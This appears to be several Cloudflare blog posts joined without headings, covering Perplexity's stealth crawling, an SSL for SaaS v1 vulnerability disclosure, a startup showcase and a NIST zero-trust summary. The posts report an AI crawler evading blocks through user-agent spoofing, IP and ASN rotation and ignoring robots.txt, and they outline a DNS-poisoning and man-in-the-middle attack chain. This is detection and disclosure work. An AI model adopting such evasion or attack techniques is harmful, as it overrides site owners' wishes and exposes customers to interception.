

We are observing stealth crawling behavior from Perplexity, an AI-powered answer engine. Although Perplexity initially crawls from their declared user agent, when they are presented with a network block, they appear to obscure their crawling identity in an attempt to circumvent the website’s preferences. We see continued evidence that Perplexity is repeatedly modifying their user agent and changing their source ASNs to hide their crawling activity, as well as ignoring, or sometimes failing to even fetch, robots.txt files.

The Internet as we have known it for the past three decades is rapidly changing, but one thing remains constant: it is built on trust. There are clear preferences that crawlers should be transparent, serve a clear purpose, perform a specific activity, and, most importantly, follow website directives and preferences. Based on Perplexity’s observed behavior, which is incompatible with those preferences, we have de-listed them as a verified bot and added heuristics to our managed rules that block this stealth crawling.









We received complaints from customers who had both disallowed Perplexity crawling activity in their robots.txt files and also created WAF rules to specifically block both of Perplexity’s declared crawlers: PerplexityBot and Perplexity-User. These customers told us that Perplexity was still able to access their content even when they saw its bots successfully blocked. We confirmed that Perplexity’s crawlers were in fact being blocked on the specific pages in question, and then performed several targeted tests to confirm what exact behavior we could observe.

We created multiple brand-new domains, similar to testexample.com and secretexample.com. These domains were newly purchased and had not yet been indexed by any search engine nor made publicly accessible in any discoverable way. On each one we implemented a robots.txt file with directives to stop any respectful bots from accessing any part of the website.
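The exact robots.txt file used in the test is not reproduced here. As a minimal sketch, assuming the conventional blanket form (`User-agent: *` with `Disallow: /`), the following shows how a respectful crawler would evaluate such a file using Python's standard `urllib.robotparser`. The helper name `is_allowed` and the example URL are illustrative only.

```python
from urllib.robotparser import RobotFileParser

# Assumed blanket policy: every user agent is disallowed from every path.
ROBOTS_TXT = """\
User-agent: *
Disallow: /
"""


def is_allowed(user_agent: str, url: str, robots_txt: str = ROBOTS_TXT) -> bool:
    """Return True if robots_txt permits user_agent to fetch url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)


if __name__ == "__main__":
    for agent in ("PerplexityBot", "Perplexity-User", "ChatGPT-User"):
        # A crawler that honors the file should skip the fetch when this is False.
        print(agent, is_allowed(agent, "https://testexample.com/any/page"))
```

With a file like this, no path on the site is fetchable by any crawler that honors robots.txt, so any content that later appears in an answer must have been retrieved by a client that ignored the file.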

We conducted an experiment by querying Perplexity AI with questions about these domains, and discovered Perplexity was still providing detailed information regarding the exact content hosted on each of these restricted domains. This response was unexpected, as we had taken all necessary precautions to prevent this data from being retrievable by their crawlers.

Bypassing Robots.txt and undisclosed IPs/User Agents







Our test domains explicitly prohibited all automated access through robots.txt and had specific WAF rules that blocked crawling from Perplexity’s public crawlers. We observed that Perplexity uses not only their declared user agent, but also a generic browser user agent intended to impersonate Google Chrome on macOS when their declared crawler was blocked.

| Crawler | User agent | Request volume |
| --- | --- | --- |
| Declared | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexity-user) | 20-25m daily requests |
| Stealth | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | 3-6m daily requests |
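To illustrate why a block rule keyed only on the declared crawler names cannot catch the second user agent, here is a small sketch. It is not Cloudflare's WAF logic; `matches_declared_crawler` is a hypothetical helper that looks for the two declared product tokens named in this post.

```python
import re

# Product tokens of the two declared crawlers named in the post.
DECLARED_TOKENS = ("PerplexityBot", "Perplexity-User")

_DECLARED_RE = re.compile(
    "|".join(re.escape(token) for token in DECLARED_TOKENS), re.IGNORECASE
)

DECLARED_UA = (
    "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; "
    "Perplexity-User/1.0; +https://perplexity.ai/perplexity-user)"
)
STEALTH_UA = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
)


def matches_declared_crawler(user_agent: str) -> bool:
    """Return True if the user agent carries a declared Perplexity token."""
    return _DECLARED_RE.search(user_agent) is not None


if __name__ == "__main__":
    print(matches_declared_crawler(DECLARED_UA))  # matched by a name-based rule
    print(matches_declared_crawler(STEALTH_UA))   # indistinguishable from Chrome by name
```

Because the stealth string carries no identifying token, detecting it requires signals other than the user agent itself.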

Both their declared and undeclared crawlers were attempting to access the content for scraping contrary to the web crawling norms as outlined in RFC 9309.



This undeclared crawler utilized multiple IPs not listed in Perplexity’s official IP range, and would rotate through these IPs in response to the restrictive robots.txt policy and block from Cloudflare. In addition to rotating IPs, we observed requests coming from different ASNs in attempts to further evade website blocks. This activity was observed across tens of thousands of domains and millions of requests per day. We were able to fingerprint this crawler using a combination of machine learning and network signals.



An example:

Of note: when the stealth crawler was successfully blocked, we observed that Perplexity uses other data sources, including other websites, to try to create an answer. However, these answers were less specific and lacked details from the original content, reflecting the fact that the block had been successful.

In contrast to the behavior described above, the Internet has expressed clear preferences on how good crawlers should behave. All well-intentioned crawlers acting in good faith should:

Be transparent. Identify themselves honestly, using a unique user-agent, a declared list of IP ranges or Web Bot Auth integration, and provide contact information if something goes wrong.

Be well-behaved netizens. Don’t flood sites with excessive traffic, scrape sensitive data, or use stealth tactics to try and dodge detection.

Serve a clear purpose. Whether it’s powering a voice assistant, checking product prices, or making a website more accessible, every bot has a reason to be there. The purpose should be clearly and precisely defined and easy for site owners to look up publicly.

Separate bots for separate activities. Perform each activity from a unique bot. This makes it easy for site owners to decide which activities they want to allow. Don’t force site owners to make an all-or-nothing decision.

Follow the rules. That means checking for and respecting website signals like robots.txt, staying within rate limits, and never bypassing security protections.

More details are outlined in our official Verified Bots Policy Developer Docs.

OpenAI is an example of a leading AI company that follows these best practices. They clearly outline their crawlers and give detailed explanations for each crawler’s purpose. They respect robots.txt and do not try to evade either a robots.txt directive or a network-level block. And ChatGPT Agent is signing HTTP requests using the newly proposed open standard Web Bot Auth.

When we ran the same test as outlined above with ChatGPT, we found that ChatGPT-User fetched the robots file and stopped crawling when it was disallowed. We did not observe follow-up crawls from any other user agents or third party bots. When we removed the disallow directive from the robots entry, but presented ChatGPT with a block page, they again stopped crawling, and we saw no additional crawl attempts from other user agents. Both of these demonstrate the appropriate response to website owner preferences.



All the undeclared crawling activity that we observed from Perplexity’s hidden User Agent was scored by our bot management system as a bot and was unable to pass managed challenges. Any bot management customer who has an existing block rule in place is already protected. Customers who don’t want to block traffic can set up rules to challenge requests, giving real humans an opportunity to proceed. Customers with existing challenge rules are already protected. Lastly, we added signature matches for the stealth crawler into our managed rule that blocks AI crawling activity. This rule is available to all customers, including our free customers.

It's been just over a month since we announced Content Independence Day, giving content creators and publishers more control over how their content is accessed. Today, over two and a half million websites have chosen to completely disallow AI training through our managed robots.txt feature or our managed rule blocking AI Crawlers. Every Cloudflare customer is now able to selectively decide which declared AI crawlers are able to access their content in accordance with their business objectives.

We expected a change in bot and crawler behavior based on these new features, and we expect that the techniques bot operators use to evade detection will continue to evolve. Once this post is live the behavior we saw will almost certainly change, and the methods we use to stop them will keep evolving as well.

Cloudflare is actively working with technical and policy experts around the world, like the IETF efforts to standardize extensions to robots.txt, to establish clear and measurable principles that well-meaning bot operators should abide by. We think this is an important next step in this quickly evolving space.

Back in 2017, Cloudflare announced SSL for SaaS, a product that allows SaaS providers to extend the benefits of Cloudflare security and performance to their end customers. Using a “Managed CNAME” configuration, providers could bring their customer’s domain onto Cloudflare. In the first version of SSL for SaaS (v1), the traffic for Custom Hostnames is proxied to the origin based on the IP addresses assigned to the zone. In this Managed CNAME configuration, the end customers simply pointed their domains to the SaaS provider origin using a CNAME record. The customer’s origin would then be configured to accept traffic from these hostnames.

While SSL for SaaS v1 enabled broad adoption of Cloudflare for end customer domains, its architecture introduced a subtle but important security risk, one that motivated us to build Cloudflare for SaaS.

As adoption scaled, so did our understanding of the security and operational limitations of SSL for SaaS v1. The architecture depended on IP-based routing and didn’t verify domain ownership before proxying traffic. That meant that any custom hostname pointed to the correct IP could be served through Cloudflare, even if ownership hadn’t been proven. While this produced the desired functionality, this design introduced risks and created friction when customers needed to make changes without downtime.

A malicious Cloudflare user who knows another customer's Managed CNAME (through social engineering or publicly available information) could abuse the way SSL for SaaS v1 handles host header redirects, using DNS manipulation and a man-in-the-middle attack, because Cloudflare serves a valid TLS certificate for the Managed CNAME.

For regular connections to Cloudflare, the certificate served by Cloudflare is determined by the SNI provided by the client in the TLS handshake, while the zone configuration applied to a request is determined based on the host-header of the HTTP request.

In contrast, SSL for SaaS v1/Managed CNAME setups work differently. The certificate served by Cloudflare is still based on the TLS SNI, but the zone configuration is determined solely based on the specific Cloudflare anycast IP address the client connected to.

For example, let’s assume that 192.0.2.1 is the anycast IP address assigned to a SaaS provider. All connections to this IP address will be routed to the SaaS provider's origin server, irrespective of the host-header in the HTTP request. This means that for the following request:

    $ curl --connect-to ::192.0.2.1 https://www.cloudflare.com

The certificate served by Cloudflare will be valid for www.cloudflare.com, but the request will not be sent to the origin server of www.cloudflare.com. It will instead be sent to the origin server of the SaaS provider assigned to the 192.0.2.1 IP address.
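The mismatch described above can be modeled in a few lines. This is a toy sketch, not Cloudflare's edge code: the three lookup tables, the `Request` type, and the `route` function are all hypothetical stand-ins, and 198.51.100.7 is just a documentation address used to represent a regular anycast IP.

```python
from dataclasses import dataclass
from typing import Optional, Tuple

# Hypothetical lookup tables standing in for edge configuration.
CERTS_BY_SNI = {"www.cloudflare.com": "cert for www.cloudflare.com"}
ORIGIN_BY_HOST = {"www.cloudflare.com": "origin of www.cloudflare.com"}
ORIGIN_BY_V1_IP = {"192.0.2.1": "origin of the SaaS provider"}


@dataclass(frozen=True)
class Request:
    dest_ip: str      # anycast IP the client connected to
    sni: str          # server name from the TLS handshake
    host_header: str  # Host header of the HTTP request


def route(req: Request) -> Tuple[Optional[str], Optional[str]]:
    """Return (certificate served, origin that receives the request)."""
    # The certificate is always chosen from the TLS SNI.
    cert = CERTS_BY_SNI.get(req.sni)
    if req.dest_ip in ORIGIN_BY_V1_IP:
        # SSL for SaaS v1: the destination IP alone selects the zone.
        origin = ORIGIN_BY_V1_IP[req.dest_ip]
    else:
        # Regular connections: the Host header selects the zone.
        origin = ORIGIN_BY_HOST.get(req.host_header)
    return cert, origin


if __name__ == "__main__":
    print(route(Request("198.51.100.7", "www.cloudflare.com", "www.cloudflare.com")))
    print(route(Request("192.0.2.1", "www.cloudflare.com", "www.cloudflare.com")))
```

In the second call the certificate and the origin belong to different parties, which is the gap between certificate selection and routing that the vulnerability relies on.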

While the likelihood of exploiting this vulnerability is low and requires multiple complex conditions to be met, the vulnerability can be paired with other issues and potentially exploit other Cloudflare customers if:

The adversary is able to perform DNS poisoning on the target domain to change the IP address that the end-user connects to when visiting the target domain

The adversary is able to place a malicious payload on the Managed CNAME customer’s website, or discovers an existing cross-site scripting vulnerability on the website



To address these challenges, we launched SSL for SaaS v2 (Cloudflare for SaaS) and deprecated SSL for SaaS v1 in 2021. Cloudflare for SaaS transitioned away from IP-based routing towards a verified custom hostname model. Now, custom hostnames must pass a hostname verification step alongside SSL certificate validation to proxy to the customer origin. This improves security by limiting origin access to authorized hostnames and reduces downtime through hostname pre-validation, which allows customers to verify ownership before traffic is proxied through Cloudflare.
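As a rough sketch of the verified custom hostname model, the gate below proxies a request only when the hostname has passed both checks. The `CustomHostname` record, its field names, and `resolve_origin` are assumptions made for illustration and do not reflect the actual Cloudflare for SaaS data model or API.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class CustomHostname:
    hostname: str
    origin: str
    hostname_verified: bool = False      # ownership of the hostname proven
    certificate_validated: bool = False  # SSL certificate validation passed


def resolve_origin(
    host_header: str, hostnames: Dict[str, CustomHostname]
) -> Optional[str]:
    """Return the origin for a request, or None if it must not be proxied."""
    entry = hostnames.get(host_header.lower())
    if entry is None:
        return None  # unknown hostname: never routed by IP alone
    if not (entry.hostname_verified and entry.certificate_validated):
        return None  # pending verification: no traffic reaches the origin
    return entry.origin


if __name__ == "__main__":
    table = {
        "shop.example.com": CustomHostname(
            "shop.example.com", "saas-origin.example.net", True, True
        ),
        "pending.example.com": CustomHostname(
            "pending.example.com", "saas-origin.example.net", True, False
        ),
    }
    for host in ("shop.example.com", "pending.example.com", "other.example.org"):
        print(host, resolve_origin(host, table))
```

Routing is keyed on a verified hostname rather than on the IP address the client happened to connect to, so pointing an unverified hostname at the right IP no longer reaches an origin.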

When Cloudflare for SaaS became generally available, we began a careful and deliberate deprecation of the original architecture. Starting in March 2021, we notified all v1 users of the then upcoming sunset in favor of v2 in September 2021 with instructions to migrate. Although we officially deprecated Managed CNAME, some customers were granted exceptions and various zones remained on SSL for SaaS v1. Cloudflare was notified this year through our Bug Bounty program that an external researcher had identified the SSL for SaaS v1 vulnerabilities in the midst of our continued efforts to migrate all customers.

The majority of customers have successfully migrated to the modern v2 setup. For those few that require more time to migrate, we've implemented compensating controls to limit the potential scope and reach of this issue for the remaining v1 users. Specifically:

This feature is unavailable for new customer accounts, and new zones within existing customer accounts, to configure via the UI or API

Cloudflare actively maintains an allowlist of zones & customers that currently use the v1 service

We have also implemented WAF custom rules configurations for the remaining customers such that any requests targeting an unauthorized destination will be caught and blocked in their L7 firewall.

The architectural improvement of Cloudflare for SaaS not only closes the gap between certificate and routing validation but also ensures that only verified and authorized domains are routed to their respective origins—effectively eliminating this class of vulnerability.

There is no action necessary for Cloudflare customers, with the exception of remaining SSL for SaaS v1 customers, with whom we are actively working to help migrate. While we move to the final phases of sunsetting v1, Cloudflare for SaaS is now the standard across our platform, and all current and future deployments will use this secure, validated model by default.

As always, thank you to the external researchers for responsibly disclosing this vulnerability. We encourage all of our Cloudflare community to submit any identified vulnerabilities to help us continually improve upon the security posture of our products and platform.

We also recognize that the trust you place in us is paramount to the success of your infrastructure on Cloudflare. We consider these vulnerabilities with the utmost concern and will continue to do everything in our power to mitigate impact. Although we are confident in our steps to mitigate impact, we recognize the concern that such incidents may induce. We deeply appreciate your continued trust in our platform and remain committed not only to prioritizing security in all we do, but also acting swiftly and transparently whenever an issue does arise.

As part of MSME Day, we wanted to highlight some of the amazing startups and small businesses that are using Cloudflare to not only secure and improve their websites, but also build, scale, and deploy new serverless applications (and businesses) directly on Cloudflare's global network.

Cloudflare started as an idea to provide better security and performance tools for everyone. Back in 2010, if you were a large enterprise and wanted better performance and security for your website, you could buy an expensive piece of on-premise hardware or contract with a large, global Content Delivery Network (CDN) provider. Those same types of services were not only unaffordable for most website owners or smaller businesses, but also generally unavailable, as they typically demanded expensive on-premise hardware or direct server access that most smaller operations lacked. Cloudflare launched, fittingly at a startup competition, with the goal of making those same types of tools available to everyone.

As Cloudflare has grown, we have continued to highlight how our millions of free customers, many of them individual developers, startups, and small businesses, drive our network, company, and mission. They help keep our costs low, allow us to interconnect with more networks, and help us build better products.

Over the last 12 months, we have put even more of an emphasis on supporting startup and small business communities by expanding free developer tools, which make it easier for anyone to build full stack, AI-enabled applications directly on Cloudflare's network, and investing in programs like Cloudflare for Startups, Workers Launchpad, and the Dev Alliance. For example:

More than 3,000 startups are receiving free credits to build and scale their applications directly on Cloudflare's global network using our developer services.

In 2024 alone, 122 startups in 22 countries were accepted into Cloudflare's Launchpad Program, which provides additional infrastructure, tools, and community support to help entrepreneurs scale their applications and businesses, including access to Cloudflare demo days.

Since 2022, Cloudflare has worked with over 40 venture capital partners to secure more than $2 billion in potential financing for companies participating in our startup programs.

With the right tools in hand, entrepreneurs are turning ideas into real world impact, and we’re honored to support them.

Cloudflare proudly supports hundreds of thousands of small businesses that are using our services, including SaaS startups, health and wellness providers, real estate firms, local retailers, and global service providers. Here are just a few examples of these amazing new companies.

A scalable headless CMS for developers that generates fully documented APIs, delivered worldwide using Workers and Pages.

Enables mobile developers to push live updates without app store delays, with Workers & R2 distributing updates at the edge.

Offers real-time and historical exchange rate data for 150+ currencies, using Workers to ensure fast, reliable API access.

Turns Notion pages into embeddable web content, dynamically rendered and cached with Workers and Pages.

An open-source visual site builder delivering fast, global performance through Pages and Workers.

Streamlines code review workflows to reduce tech debt, with Workers helping automate and scale delivery.

A global optical retailer modernizing its frontend architecture using Pages and Workers for faster, scalable web experiences.

A full-stack platform for Nuxt developers to build, store, and deploy apps with ease, integrated with Workers, Pages, and more.

A curated directory of startup tools, served instantly worldwide with Pages and Workers.

Builds AI-native productivity tools that are fast, modular, and edge-ready using Cloudflare to support performance and flexibility.

Offers open-source Capacitor plugins for mobile developers, with docs and assets served quickly via Workers and Pages.

No-code storefronts for food brands, delivering ultra-low latency and handling high traffic with Workers.

Creates interactive sales documents that load fast and stay secure globally using Workers, KV, and R2.

Multiplayer game SDK and backend platform providing low-latency previews and real-time APIs with Workers and Pages.

Powers transport apps with geolocation-aware content and secure APIs, ensuring uptime even in remote areas via Workers.

AI-driven presentation builder handling high-volume rendering quickly using Pages and Workers.

Provides tools for logistics companies to monitor vehicle fleets, manage drivers, and improve fuel efficiency.

Social platform focused on meaningful questions, fast-loading and globally accessible with Pages and Workers.

Provides secure identity infrastructure with high-performance APIs and built-in protection using Workers and R2.

AI-powered scheduling tool delivering fast booking and timezone handling at Cloudflare’s edge.

Ambient audio streaming with ultra-low latency for mobile and desktop users, powered by Workers and R2.

Property search platform delivering fast, map-based listings and seamless mobile experience via Pages and Workers.

Digital garden showcasing creative web projects, hosted and powered for speed on Pages and Workers.

Inventory management app delivering fast UIs and APIs globally using Workers, R2, and Pages.

Mobile-friendly mini websites from Instagram bios, powered by Workers for routing and Pages for hosting.

Cloudflare is also working with our civil society partners in the Asia-Pacific region to help provide security training for new businesses. For example, in 2025, we partnered with Cyberpeace, a leading nonprofit organization in India, to host a webinar focused on building cyber resilience. The session included a live onboarding session, training on security services, and information on the most common cyber threats. Our first session attracted over 95 participants, and due to the high demand, Cloudflare is planning to host an additional in-person training session later this year. Stay tuned for more details!





It is incredible to see all the innovative ways companies are building new ideas with Cloudflare. However, as a startup originally designed to protect other startups, we know security remains one of the most pressing concerns for any small business. According to the U.S. Federal Communications Commission, theft of digital information has surpassed physical theft as the most commonly reported fraud for small businesses. In 2025 so far, Cloudflare has mitigated over three million Layer 3 (network layer) DDoS attacks targeting small businesses protected by our network.

This year, to help celebrate MSME Day, Cloudflare is continuing our efforts to provide training and capacity building for our small business partners by releasing a brand new Cloudflare Small Business Security Guide. The guide includes step-by-step instructions that will allow anyone to better understand cybersecurity services and protect their business and customers from common cyberattacks. For more information, visit the Cloudflare for Small Businesses page to download the guide today.

Cloudflare will always make robust security services available to any small business that needs them, free of charge. It is a fundamental part of our mission to help build a better Internet and our identity as a company.

If you are building a small business and need access to better developer or security services, getting started with Cloudflare is simple, fast, and straightforward. Signing up for a Free plan takes only minutes and can instantly provide access to the tools you need to secure and accelerate your web presence and keep your small business thriving.

NIST has released another Special Publication in this series, SP 1800-35, titled "Implementing a Zero Trust Architecture (ZTA)", which aims to provide practical steps and best practices for deploying ZTA across various environments. NIST’s publications about ZTA have been extremely influential across the industry, but are often lengthy and highly detailed, so this blog post provides a short and easier-to-read summary of NIST’s latest guidance on ZTA.

And so, in this blog post:

We summarize the key items you need to know about this new NIST publication, which presents a reference architecture for Zero Trust Architecture (ZTA) along with a series of “Builds” that demonstrate how different products from various vendors can be combined to construct a ZTA that complies with the reference architecture.

We show how Cloudflare’s Zero Trust product suite can be integrated with offerings from other vendors to support a Zero Trust Architecture that maps to the NIST’s reference architecture.

We highlight a few key features of Cloudflare’s Zero Trust platform that are especially valuable to customers seeking compliance with NIST’s ZTA reference architecture, including compliance with FedRAMP and new post-quantum cryptography standards.

Let’s dive into NIST’s special publication!

In SP 1800-35, NIST reminds us that:

A zero-trust architecture (ZTA) enables secure authorized access to assets (machines, applications and services running on them, and associated data and resources) whether located on-premises or in the cloud, for a hybrid workforce and partners based on an organization’s defined access policy.

NIST uses the term Subject to refer to entities (e.g. employees, developers, devices) that require access to Resources (e.g. computers, databases, servers, applications). SP 1800-35 focuses on developing and demonstrating various ZTA implementations that allow Subjects to access Resources. Specifically, the reference architecture in SP 1800-35 focuses mainly on EIG or “Enhanced Identity Governance,” a specific approach to Zero Trust Architecture, which is defined by NIST in SP 800-207 as follows:

For [the EIG] approach, enterprise resource access policies are based on identity and assigned attributes.

The primary requirement for [R]esource access is based on the access privileges granted to the given [S]ubject. Other factors such as device used, asset status, and environmental factors may alter the final confidence level calculation ... or tailor the result in some way, such as granting only partial access to a given [Resource] based on network location.

Individual [R]esources or [policy enforcement points (PEP)] must have a way to forward requests to a policy engine service or authenticate the [S]ubject and approve the request before granting access.

While there are other approaches to ZTA mentioned in the original NIST SP 800-207, we omit those here because SP 1800-35 focuses mostly on EIG.
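The EIG definition quoted above can be read as a small decision procedure: identity and granted privileges come first, then other factors adjust confidence or narrow the result. The sketch below is only an illustration of that reading. The types, the 0.6 penalty, and the 0.5 threshold are arbitrary assumptions and come from neither NIST nor Cloudflare.

```python
from dataclasses import dataclass
from enum import Enum
from typing import FrozenSet


class Decision(Enum):
    DENY = "deny"
    PARTIAL = "partial"
    GRANT = "grant"


@dataclass(frozen=True)
class Subject:
    identity: str
    privileges: FrozenSet[str]  # Resources this Subject has been granted


@dataclass(frozen=True)
class Context:
    device_compliant: bool    # device / asset status
    on_trusted_network: bool  # environmental factor (network location)


def decide(subject: Subject, resource: str, ctx: Context,
           min_confidence: float = 0.5) -> Decision:
    # Primary requirement: the privileges granted to the Subject.
    if resource not in subject.privileges:
        return Decision.DENY
    # Other factors may alter the confidence level (weights are arbitrary).
    confidence = 1.0
    if not ctx.device_compliant:
        confidence -= 0.6
    if confidence < min_confidence:
        return Decision.DENY
    # ...or tailor the result, e.g. partial access based on network location.
    if not ctx.on_trusted_network:
        return Decision.PARTIAL
    return Decision.GRANT


if __name__ == "__main__":
    alice = Subject("alice", frozenset({"payroll-db"}))
    print(decide(alice, "payroll-db", Context(True, True)))
    print(decide(alice, "payroll-db", Context(True, False)))
    print(decide(alice, "payroll-db", Context(False, True)))
```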



The ZTA reference architecture from SP 1800-35 focuses on EIG approaches as a set of logical components as shown in the figure below.  Each component in the reference architecture does not necessarily correspond directly to physical (hardware or software) components, or products sold by a single vendor, but rather to the logical functionality of the component.

Figure 1: General ZTA Reference Architecture. Source: NIST, Special Publication 1800-35, "Implementing a Zero Trust Architecture (ZTA)," 2025.

The logical components in the reference architecture are all related to the implementation of policy. Policy is crucial for ZTA because the whole point of a ZTA is to apply policies that determine who has access to what, when and under what conditions.

The core components of the reference architecture are as follows:

| Component | Description |
| --- | --- |
| Policy Enforcement Point (PEP) | The PEP protects the “trust zones” that host enterprise Resources, and handles enabling, monitoring, and eventually terminating connections between Subjects and Resources. You can think of the PEP as the dataplane that supports the Subject’s access to the Resources. |
| Policy Engine (PE) | The PE handles the ultimate decision to grant, deny, or revoke access to a Resource for a given Subject, and calculates the trust scores/confidence levels and ultimate access decisions based on enterprise policy and information from supporting components. |
| Policy Administrator (PA) | The PA executes the PE’s policy decision by sending commands to the PEP to establish and terminate the communications path between the Subject and the Resource. |
| Policy Decision Point (PDP) | The PDP is where the decision as to whether or not to permit a Subject to access a Resource is made. The PDP includes the Policy Engine (PE) and the Policy Administrator (PA). You can think of the PDP as the control plane that controls the Subject’s access to the Resources. |

The PDP operates on inputs from Policy Information Points (PIPs), which are supporting components that provide critical data and policy rules to the PDP.

| Component | Description |
| --- | --- |
| Policy Information Point (PIP) | The PIPs provide various types of telemetry and other information needed for the PDP to make informed access decisions. Some PIPs include ICAM, EDR/EPP, security analytics, and data security. NIST’s figure might suggest that supporting components in the PIP are mere plug-ins responding in real-time to the PDP. However, for many vendors, the ICAM, EDR/EPP, security analytics, and data security PIPs often represent complex and distributed infrastructures. |
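To make the division of labor between these components concrete, here is a minimal sketch of how they could be wired together. The class and method names are hypothetical, and PIPs are reduced to simple callables. A real deployment would place these roles in separate, distributed systems.

```python
from typing import Callable, Dict, Set, Tuple

Facts = Dict[str, object]
PIP = Callable[[str], object]                 # supplies one fact about a Subject
Policy = Callable[[str, str, Facts], bool]    # enterprise policy


class PolicyEngine:
    """PE: makes the grant/deny decision from policy plus PIP inputs."""

    def __init__(self, policy: Policy, pips: Dict[str, PIP]) -> None:
        self.policy = policy
        self.pips = pips

    def decide(self, subject: str, resource: str) -> bool:
        facts = {name: pip(subject) for name, pip in self.pips.items()}
        return self.policy(subject, resource, facts)


class PolicyEnforcementPoint:
    """PEP: the dataplane that opens and terminates connections."""

    def __init__(self) -> None:
        self.connections: Set[Tuple[str, str]] = set()

    def connect(self, subject: str, resource: str) -> None:
        self.connections.add((subject, resource))

    def terminate(self, subject: str, resource: str) -> None:
        self.connections.discard((subject, resource))


class PolicyAdministrator:
    """PA: executes the PE's decision by commanding the PEP."""

    def __init__(self, pep: PolicyEnforcementPoint) -> None:
        self.pep = pep

    def execute(self, subject: str, resource: str, allowed: bool) -> None:
        if allowed:
            self.pep.connect(subject, resource)
        else:
            self.pep.terminate(subject, resource)


class PolicyDecisionPoint:
    """PDP: the control plane, composed of the PE and the PA."""

    def __init__(self, engine: PolicyEngine, admin: PolicyAdministrator) -> None:
        self.engine = engine
        self.admin = admin

    def evaluate(self, subject: str, resource: str) -> bool:
        allowed = self.engine.decide(subject, resource)
        self.admin.execute(subject, resource, allowed)
        return allowed


def build_demo() -> Tuple[PolicyDecisionPoint, PolicyEnforcementPoint]:
    compliant = {"alice"}  # toy endpoint-security PIP data
    pips: Dict[str, PIP] = {"device_compliant": lambda s: s in compliant}
    policy: Policy = lambda s, r, f: bool(f["device_compliant"]) and r == "wiki"
    pep = PolicyEnforcementPoint()
    pdp = PolicyDecisionPoint(PolicyEngine(policy, pips), PolicyAdministrator(pep))
    return pdp, pep
```

Calling `pdp.evaluate("alice", "wiki")` on the demo objects opens a connection at the PEP, while the same call for a Subject whose device is not in the compliant set leaves the PEP untouched.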

Next, SP 1800-35 introduces two more detailed reference architectures, the “Crawl Phase” and the “Run Phase.” The “Run Phase” corresponds to the reference architecture that is shown in the figure above. The “Crawl Phase” is a simplified version of this reference architecture that only deals with protecting on-premise Resources, and omits cloud Resources. Both of these phases focus on Enhanced Identity Governance approaches to ZTA, as we defined above. NIST stated, "We are skipping the EIG walk phase and have proceeded directly to the run phase".

SP 1800-35 then provides a sequence of detailed instructions, called “Builds,” that show how to implement “Crawl Phase” and “Run Phase” reference architectures using products sold by various vendors.

Since Cloudflare’s Zero Trust platform natively supports access to both cloud and on-premise resources, we will skip over the “Crawl Phase” and move directly to showing how Cloudflare’s Zero Trust platform can be used to support the “Run Phase” of the reference architecture.

Nothing in NIST SP 1800-35 represents an endorsement of specific vendor technologies. Instead, the intent of the publication is to offer a general architecture that applies regardless of the technologies or vendors an organization chooses to deploy. It also includes a series of “Builds” using a variety of technologies from different vendors, that allow organizations to achieve a ZTA. This section describes how Cloudflare fits in with a ZTA, enabling you to accelerate your ZTA deployment from Crawl directly to Run.

Regarding the “Builds” in SP 1800-35, this section can be viewed as an aggregation of the following three specific builds:

Enterprise 1 Build 3 (E1B3): Software-Defined Perimeter (SDP) with Cloudflare as the Policy Engine (PE).

Enterprise 2 Build 4 (E2B4): SDP and Secure Access Service Edge (SASE) with Cloudflare Secure Web Gateway, Cloudflare Zero Trust Network Access (ZTNA), and Cloudflare Cloud Access Security Broker as PEs.

Enterprise 3 Build 5 (E3B5): SDP and SASE with Microsoft Entra Conditional Access (formerly known as Azure AD Conditional Access) and Cloudflare Zero Trust as PEs.



Now let’s see how we can map Cloudflare’s Zero Trust platform to the ZTA reference architecture:

Figure 2: General ZTA Reference Architecture Mapped to Cloudflare Zero Trust & Key Integrations. Source: NIST, Special Publication 1800-35, "Implementing a Zero Trust Architecture (ZTA)," 2025, with modification by Cloudflare.

Cloudflare’s platform simplifies complexity by delivering the PEP via our global anycast network and the PDP via our Software-as-a-Service (SaaS) management console, which also serves as a global unified control plane. A complete ZTA involves integrating Cloudflare with PIPs provided by other vendors, as shown in the figure above.

Now let’s look at several key points in the figure.

In the bottom right corner of the figure are Resources, which may reside on-premise, in private data centers, or across multiple cloud environments.  Resources are made securely accessible through Cloudflare’s global anycast network via Cloudflare Tunnel (as shown in the figure) or Magic WAN (not shown). Resources are shielded from direct exposure to the public Internet by placing them behind Cloudflare Access and Cloudflare Gateway, which are PEPs that enforce zero-trust principles by granting access to Subjects that conform to policy requirements.

In the bottom left corner of the figure are Subjects, both human and non-human, that need access to Resources. With Cloudflare’s platform, there are multiple ways that Subjects can gain access to Resources, including:

Agentless approaches that allow end users to access Resources directly from their web browsers. Alternatively, Cloudflare’s Magic WAN can be used to support connections from enterprise networks directly to Cloudflare’s global anycast network via IPsec tunnels, GRE tunnels or Cloudflare Network Interconnect (CNI).

Agent-based approaches use Cloudflare’s lightweight WARP client, which protects corporate devices by securely and privately sending traffic to Cloudflare's global network.

Now we move on to the PEP (the Policy Enforcement Point), which is the dataplane of our ZTA. Cloudflare Access is a modern Zero Trust Network Access solution that serves as a dynamic PEP, enforcing user-specific application access policies based on identity, device posture, context, and other factors. Cloudflare Gateway is a Secure Web Gateway for filtering and inspecting traffic sent to the public Internet, serving as a dynamic PEP that provides DNS, HTTP and network traffic filtering, DNS resolver policies, and egress IP policies.

Both Cloudflare Access and Cloudflare Gateway rely on Cloudflare’s control plane, which acts as a PDP offering a policy engine (PE) and policy administrator (PA).  This PDP takes in inputs from PIPs provided by integrations with other vendors for ICAM, endpoint security, and security analytics.  Let’s dig into some of these integrations.

